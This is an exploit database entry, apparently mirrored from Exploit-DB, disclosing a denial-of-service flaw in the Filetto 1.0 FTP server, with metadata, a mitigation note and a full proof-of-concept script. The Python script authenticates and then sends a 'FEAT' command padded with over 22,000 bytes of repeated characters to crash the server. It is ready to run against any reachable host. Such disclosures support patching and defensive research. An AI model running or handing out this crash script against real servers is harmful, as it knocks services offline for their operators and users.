Filetto 1.0 - 'FEAT' Denial of Service (PoC)

vendor:

Filetto

by:

Alvaro J. Gene

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Filetto

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: YES

Related CWE: N/A

CPE: a:utillyty:filetto:1.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 SP1

2020

Filetto 1.0 – ‘FEAT’ Denial of Service (PoC)

A denial of service vulnerability exists in Filetto 1.0, which allows an authenticated user to crash the FTP server by sending a specially crafted 'FEAT' command with an overly long string. This could allow an attacker to crash the FTP server, resulting in a denial of service condition.

Mitigation:

Upgrade to the latest version of Filetto, which is not vulnerable to this attack.

Source

Exploit-DB raw data:

# Exploit Title: Filetto 1.0 - 'FEAT' Denial of Service (PoC) 
# Date: 2020-05-13
# Found by: Alvaro J. Gene (Socket_0x03)
# Vendor Homepage: http://www.utillyty.eu
# Software Link: https://sourceforge.net/projects/filetto
# Vulnerable Application: Filetto
# Version: 1.0 (last version. Updated: 01/31/2020)
# Server: FTP Server
# Vulnerable Command: FEAT
# Tested on: Windows 7 SP1


====================================================================================================
======================== [ Filetto v1.0 - 'FEAT' Denial of Service (PoC) ] =========================
====================================================================================================


from socket import *

host = "192.168.0.14"
port = 2021
username = "Socket_0x03"
password = "password"

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)

s.send("USER %s\r\n" % (username))
print s.recv(1024)

s.send("PASS %s\r\n" % (password))
print s.recv(1024)

buffer = "FEAT "
buffer += "\x41\x2c" * 11008
buffer += "\r\n"

s.send(buffer)
print s.recv(1024)

s.close()